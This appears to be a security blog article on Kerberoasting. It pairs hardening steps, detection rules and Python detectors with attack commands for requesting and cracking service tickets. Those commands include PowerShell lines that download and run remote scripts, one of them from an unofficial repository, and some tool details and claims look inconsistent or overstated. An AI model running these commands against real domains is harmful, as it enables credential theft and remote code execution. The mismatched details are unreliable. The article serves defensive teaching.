
Introduction:
Kerberoasting is a post-exploitation attack that targets service accounts in Active Directory, allowing any domain-authenticated user to request a service ticket (TGS) for any service and crack it offline. Unlike other attacks, Kerberoasting generates no anomalous event ID 4769 spikes if done carefully, bypassing most endpoint detection and response (EDR) solutions. This article dissects the attack from enumeration to offline cracking on Linux and Windows, then provides hardened configurations, detection rules, and AI-driven log analysis techniques.
Learning Objectives:
- Execute a full Kerberoasting attack chain using Impacket, Rubeus, and hashcat.
- Identify vulnerable service accounts via LDAP enumeration and PowerShell.
- Implement detection mechanisms including Windows Event Tracing and SIEM queries, plus AI-based anomaly detection.
You Should Know:
1. Enumeration & Ticket Extraction – Step by Step
Kerberoasting begins with identifying accounts that have Service Principal Names (SPNs) and weak encryption (RC4_HMAC). Below are verified commands for Linux and Windows.
Linux with Impacket (Python3):
# Install Impacket
pip3 install impacket
# Enumerate SPNs and request TGS tickets
impacket-GetUserSPNs -request -dc-ip 192.168.1.10 domain.local/standarduser -outputfile kerb_tickets.txt
Windows with Rubeus (compiled C#):
# Download Rubeus (from GhostPack)
iex (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/r3motecontrol/GhostPack/master/Rubeus/Rubeus.ps1")
# Request all TGS tickets with RC4 encryption
Rubeus.exe kerberoast /outfile:hash.txt /rc4opsec
What does this do? These tools query Active Directory for accounts with SPNs (e.g., MSSQLSvc, HTTP, CIFS). For each result, they request a service ticket encrypted with the service account’s NTLM hash. The ticket is exported in a crackable format (HashCat mode 13100).
Pro tip: Limit ticket requests to privileged accounts (`adminCount=1`) by using the LDAP filter `(&(servicePrincipalName=*)(adminCount=1))`.
2. Offline Cracking – Hashcat & John
Once you have the hash file, cracking reveals the plaintext password. Most service accounts use weak passwords.
Hashcat (Linux):
# Using rockyou wordlist with rules
hashcat -m 13100 -a 0 kerb_hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
# For GPU optimization (mask attack)
hashcat -m 13100 -a 3 kerb_hash.txt ?l?l?l?l?d?d?d?d -i --increment-min=8
John the Ripper (Windows – Cygwin/Msys2):
.\john.exe --format=krb5tgs --wordlist=rockyou.txt hash.txt
Why RC4 is dangerous: Even if AES encryption is enabled, the attacker can force RC4 by omitting the `-aes` flag in Rubeus or using `-enctype RC4` in Impacket. Mitigation is to disable RC4 for Kerberos entirely (Group Policy: Network security: Configure encryption types allowed for Kerberos).
3. Hardening Against Kerberoasting – Group Policy & PowerShell
Prevent the attack by eliminating weak service accounts and enforcing AES.
Disable RC4 via GPO:
- Open Group Policy Management → Edit Default Domain Policy
- Computer Configuration → Policies → Windows Settings → Security Settings → Local Policies → Security Options
- Set `Network security: Configure encryption types allowed for Kerberos` → Check only `AES128_HMAC_SHA1` and `AES256_HMAC_SHA1`
Find and remediate vulnerable accounts (PowerShell as Domain Admin):
# List all accounts with SPNs that are not restricted to AES (24 = AES128 + AES256)
Get-ADUser -Filter {ServicePrincipalName -like "*"} -Properties ServicePrincipalName,msDS-SupportedEncryptionTypes |
    Where-Object {$_.'msDS-SupportedEncryptionTypes' -ne 24} |
    Select-Object Name, ServicePrincipalName
# Disable RC4 for a specific service account
Set-ADUser -Identity svc_sql -Replace @{'msDS-SupportedEncryptionTypes'=24}
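The `-ne 24` filter above works because `msDS-SupportedEncryptionTypes` is a bit mask. As an added example (not code from the original post), the script below decodes that mask and lists SPN-bearing accounts that still permit RC4, including the edge case the PowerShell also catches: an unset attribute imposes no restriction, so the domain default (which includes RC4) applies. The account records are constructed; in practice they come from the `Get-ADUser` query above.

```python
# Added example, not from the original post: decode the msDS-SupportedEncryptionTypes
# bit flags and list SPN-bearing accounts that still permit RC4. The account records
# below are constructed; in practice they come from the Get-ADUser query above.
DES_CBC_CRC = 0x01
DES_CBC_MD5 = 0x02
RC4_HMAC = 0x04
AES128_CTS_HMAC_SHA1_96 = 0x08
AES256_CTS_HMAC_SHA1_96 = 0x10

FLAG_NAMES = {
    DES_CBC_CRC: "DES_CBC_CRC",
    DES_CBC_MD5: "DES_CBC_MD5",
    RC4_HMAC: "RC4_HMAC",
    AES128_CTS_HMAC_SHA1_96: "AES128_CTS_HMAC_SHA1_96",
    AES256_CTS_HMAC_SHA1_96: "AES256_CTS_HMAC_SHA1_96",
}
# 24: the value the Set-ADUser command above writes (AES128 + AES256 only)
AES_ONLY = AES128_CTS_HMAC_SHA1_96 | AES256_CTS_HMAC_SHA1_96


def decode_enctypes(value):
    """Return the names of the encryption types enabled by an attribute value."""
    return [name for bit, name in sorted(FLAG_NAMES.items()) if value & bit]


def permits_rc4(value):
    """True if the account can still be issued RC4 service tickets.
    An unset (None) or 0 attribute imposes no restriction, and the domain
    default that then applies includes RC4, so such accounts count as RC4-capable."""
    if not value:
        return True
    return bool(value & RC4_HMAC)


def audit_rc4_service_accounts(accounts):
    """Return [(name, reason)] for accounts that have an SPN and permit RC4."""
    findings = []
    for acct in accounts:
        if not acct["spns"]:  # no SPN: nothing to request a service ticket for
            continue
        value = acct["enctypes"]
        if not value:
            findings.append((acct["name"], "attribute unset; domain default (includes RC4) applies"))
        elif permits_rc4(value):
            findings.append((acct["name"], f"RC4_HMAC flag set: {value:#x} = {decode_enctypes(value)}"))
    return findings


# Constructed sample records (name, SPN list, msDS-SupportedEncryptionTypes)
SAMPLE_ACCOUNTS = [
    {"name": "svc_sql", "spns": ["MSSQLSvc/sql.domain.local"], "enctypes": 0x1C},  # RC4 + AES
    {"name": "svc_web", "spns": ["HTTP/web.domain.local"], "enctypes": None},      # unset
    {"name": "svc_backup", "spns": ["backup/bk.domain.local"], "enctypes": AES_ONLY},
    {"name": "alice", "spns": [], "enctypes": None},                               # no SPN
]

if __name__ == "__main__":
    for name, reason in audit_rc4_service_accounts(SAMPLE_ACCOUNTS):
        print(f"{name}: {reason}")
```

Note that `svc_sql` is flagged even though it supports AES: a value of `0x1C` still has the RC4 bit set, and a client can ask for an RC4 ticket, which is exactly why the PowerShell above tests for "not equal to 24" rather than "has AES".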
Create managed service accounts (gMSA): They have automatic password rotation (every 30 days) and no user interactive logon.
New-ADServiceAccount -Name gMSA_SQL -DNSHostName sql.domain.local -ServicePrincipalNames "MSSQLSvc/sql.domain.local"
4. Detection via Windows Event Logs & Sysmon
Kerberoasting leaves traces, but they can be subtle. Monitor for unusual TGS requests.
Event IDs to collect:
- `4769` (Kerberos service ticket request) – look for `Ticket Encryption Type` = `0x17` (RC4) and a high volume of requests from a single user within 5 minutes.
- `5136` (Directory service change) – monitor if someone adds SPNs to low-privileged accounts (a privilege escalation trick).
Sysmon config to capture process creation for Rubeus/Impacket:
<Sysmon>
  <EventFiltering>
    <ProcessCreate onmatch="include">
      <CommandLine condition="contains">Rubeus.exe</CommandLine>
      <CommandLine condition="contains">kerberoast</CommandLine>
    </ProcessCreate>
  </EventFiltering>
</Sysmon>
KQL query for Sentinel/Splunk:
SecurityEvent
| where EventID == 4769
| where TicketEncryptionType == "0x17"
| summarize RequestCount=count() by AccountName, TargetServiceName, bin(TimeGenerated, 5m)
| where RequestCount > 10
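To see the query's logic outside a SIEM, here is an added example (not from the original post) that applies the same RC4-and-volume rule to a few constructed Event ID 4769 records. The record layout (`account`, `service`, `etype`, `time`) is an assumption; map your SIEM's field names onto it.

```python
# Added example, not from the original post: a rule-based detector that applies the
# logic of the KQL query above to constructed Event ID 4769 records. The record
# layout (account, service, etype, time) is an assumption.
from collections import defaultdict
from datetime import datetime, timedelta

ETYPE_RC4_HMAC = 0x17  # Ticket Encryption Type value for RC4-HMAC
THRESHOLD = 10         # alert when an account exceeds this many RC4 TGS requests per window


def five_minute_bin(ts):
    """Floor a timestamp to its 5-minute window, like bin(TimeGenerated, 5m)."""
    return ts.replace(minute=ts.minute - ts.minute % 5, second=0, microsecond=0)


def detect_kerberoast_bursts(events, threshold=THRESHOLD):
    """Count RC4 service-ticket requests per (account, window) and return the
    windows over the threshold, with the number of distinct SPNs touched.
    Grouping by account only means one user requesting many different SPNs
    once each still adds up; grouping by (account, service) would not."""
    counts = defaultdict(int)
    services = defaultdict(set)
    for ev in events:
        if ev["etype"] != ETYPE_RC4_HMAC:
            continue  # AES tickets are not the signal here
        key = (ev["account"], five_minute_bin(ev["time"]))
        counts[key] += 1
        services[key].add(ev["service"])
    return {key: {"requests": n, "unique_services": len(services[key])}
            for key, n in counts.items() if n > threshold}


# Constructed sample: 'standarduser' requests RC4 tickets for 12 SPNs in two minutes;
# 'alice' requests one AES ticket a minute for a file server, which is normal.
_start = datetime(2024, 1, 15, 3, 0, 0)
SAMPLE_EVENTS = [
    {"account": "standarduser", "service": f"MSSQLSvc/db{i:02d}.domain.local",
     "etype": 0x17, "time": _start + timedelta(seconds=10 * i)}
    for i in range(12)
] + [
    {"account": "alice", "service": "cifs/files.domain.local",
     "etype": 0x12, "time": _start + timedelta(minutes=i)}
    for i in range(12)
]

if __name__ == "__main__":
    for (account, window), stats in detect_kerberoast_bursts(SAMPLE_EVENTS).items():
        print(f"{window:%H:%M} {account}: {stats['requests']} RC4 TGS requests "
              f"for {stats['unique_services']} distinct services")
```

One design choice worth noting: the example groups by account only. The KQL above groups by account and service name, so a user who requests ten different SPNs once each produces ten rows with a count of 1 and never crosses the threshold; grouping by account alone, and reporting the distinct-service count alongside, catches that spray pattern.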
5. AI-Powered Anomaly Detection for Kerberoasting
Traditional rules miss low-and-slow attacks. Use machine learning on metadata.
Feature engineering for isolation forest:
- Number of unique SPNs requested per user per hour
- Entropy of target service names (random-looking SPNs are suspicious)
- Time-of-day deviation (service account requests at 3 AM)
Python script using scikit-learn (to be run on SIEM data):
import pandas as pd
from sklearn.ensemble import IsolationForest

# One row per account and time window, exported from the SIEM
df = pd.read_csv('kerberos_events.csv')
features = ['ticket_count_5min', 'unique_spns', 'entropy_tgt']
# contamination = expected fraction of anomalous rows; fit_predict returns -1 for outliers
model = IsolationForest(contamination=0.01)
df['anomaly'] = model.fit_predict(df[features])
anomalies = df[df['anomaly'] == -1]
print(f"Potential Kerberoasting: {len(anomalies)} events")
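The script above assumes the three features already exist as CSV columns. As an added example (not from the original post), the code below computes the features listed in the feature-engineering section from raw ticket-request records and then scores them with the same `IsolationForest`. The record layout and the 08:00-17:59 "business hours" window are assumptions; the sample events are constructed.

```python
# Added example, not from the original post: derive the three features listed
# above from raw ticket-request records and feed them to an IsolationForest.
# The record layout and the 08:00-17:59 "business hours" window are assumptions.
import math
from collections import Counter, defaultdict
from datetime import datetime, timedelta

BUSINESS_START, BUSINESS_END = 8, 17  # assumption: normal request hours, inclusive


def name_entropy(name):
    """Shannon entropy in bits per character; random-looking SPNs score higher
    than dictionary-like ones such as MSSQLSvc/sql.domain.local."""
    if not name:
        return 0.0
    counts = Counter(name.lower())
    n = len(name)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def hour_deviation(ts):
    """Hours outside the business window, measured on the 24-hour circle
    (3 AM is 5 hours before 08:00, 11 PM is 6 hours after 17:00)."""
    h = ts.hour
    if BUSINESS_START <= h <= BUSINESS_END:
        return 0
    circ = lambda a, b: min(abs(a - b), 24 - abs(a - b))
    return min(circ(h, BUSINESS_START), circ(h, BUSINESS_END))


def build_features(events):
    """One row per (account, hour): unique SPNs, mean SPN entropy, hour deviation."""
    spns = defaultdict(set)
    for ev in events:
        hour = ev["time"].replace(minute=0, second=0, microsecond=0)
        spns[(ev["account"], hour)].add(ev["service"])
    rows = []
    for (account, hour), names in sorted(spns.items()):
        rows.append({
            "account": account,
            "hour": hour,
            "unique_spns": len(names),
            "mean_entropy": sum(map(name_entropy, names)) / len(names),
            "hour_deviation": hour_deviation(hour),
        })
    return rows


def score_anomalies(rows, contamination=0.1):
    """Flag outlier rows with an IsolationForest (-1 = anomaly). scikit-learn is
    imported here so the feature code runs without it installed."""
    from sklearn.ensemble import IsolationForest
    X = [[r["unique_spns"], r["mean_entropy"], r["hour_deviation"]] for r in rows]
    labels = IsolationForest(contamination=contamination, random_state=0).fit_predict(X)
    return [r for r, label in zip(rows, labels) if label == -1]


# Constructed sample: alice's daytime work plus one account touching 15 SPNs at 3 AM.
_day = datetime(2024, 1, 15)
SAMPLE_EVENTS = [
    {"account": "alice", "service": "MSSQLSvc/sql.domain.local",
     "time": _day + timedelta(hours=h)}
    for h in range(9, 17)
] + [
    {"account": "alice", "service": "HTTP/web.domain.local",
     "time": _day + timedelta(hours=10, minutes=30)}
] + [
    {"account": "standarduser", "service": f"MSSQLSvc/x{i}q7.domain.local",
     "time": _day + timedelta(hours=3, minutes=i)}
    for i in range(15)
]

if __name__ == "__main__":
    rows = build_features(SAMPLE_EVENTS)
    for r in score_anomalies(rows):
        print(f"{r['hour']:%Y-%m-%d %H:00} {r['account']}: "
              f"{r['unique_spns']} SPNs, entropy {r['mean_entropy']:.2f}, "
              f"{r['hour_deviation']}h outside business hours")
```

The contamination parameter sets the fraction of rows the model will label as outliers, so with a day of data from a handful of accounts it must be far higher than the 0.01 used above on a full SIEM export; tune it against the volume you actually feed in.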
Deploy as a scheduled Azure Function or Lambda to trigger alerts when an anomaly score exceeds a threshold.
6. Purple Team Simulation – Safe Testing
Before adversaries exploit you, test your own detections.
Using Invoke-Kerberoast (PowerShell Empire legacy – but works):
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat Hashcat | Out-File -FilePath hashes.txt
Atomic Red Team test (T1558.003):
# Install Atomic Red Team
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Invoke-AtomicRedTeam.ps1')
Invoke-AtomicTest T1558.003 -TestNumbers 1
Expected output: Your EDR should generate an alert. If not, revisit detection logic.
What Undercode Say:
- Key Takeaway 1: Kerberoasting remains the #1 AD attack vector because organizations neglect service account hygiene and still allow RC4.
- Key Takeaway 2: AI-based behavioral detection catches what static rules miss – low volume, high entropy SPN requests from a legitimate user context.
Analysis: The “Pic of the Day” from Hacking Articles likely depicted a Kerberoasting workflow – a visual reminder that perfect defense requires both configuration (disable RC4, use gMSA) and active monitoring (4769 anomalies). Most blue teams focus on LSASS memory dumping while ignoring Kerberos, but offline cracking of service tickets does not require admin rights. Red teams love it because it’s silent: no process injection, no LSASS access, just native Kerberos requests. Mitigations are simple but often skipped because legacy applications may break when RC4 is disabled. The real solution is a phased approach: identify all accounts using RC4, migrate them to AES or gMSA within a 90-day window, then enforce the GPO. Meanwhile, deploy the AI anomaly detector as a compensating control. Without these steps, assume any domain user can compromise your Tier 0 within hours.
Prediction:
As EDRs improve their kernel-level visibility, Kerberoasting will evolve to use session tickets and delegation abuse (S4U2Self). Attackers will start combining Resource-Based Constrained Delegation (RBCD) with Kerberoasted credentials to achieve domain dominance in under 10 minutes. Microsoft will likely deprecate RC4 entirely in a future Windows Server release, but legacy application vendors will resist, creating a 3-5 year window of hybrid mitigations. AI-driven detection will become the standard, with SIEM vendors embedding unsupervised learning for Kerberos traffic. However, the most effective defense will remain boring: a quarterly service account password rotation policy enforced by automated tools like Azure AD Connect Health. The “Pic of the Day” is a wake-up call – act now before the silent ticketholder becomes your next breach headline.
Reported By: Infosec Cybersecurity – Hackers Feeds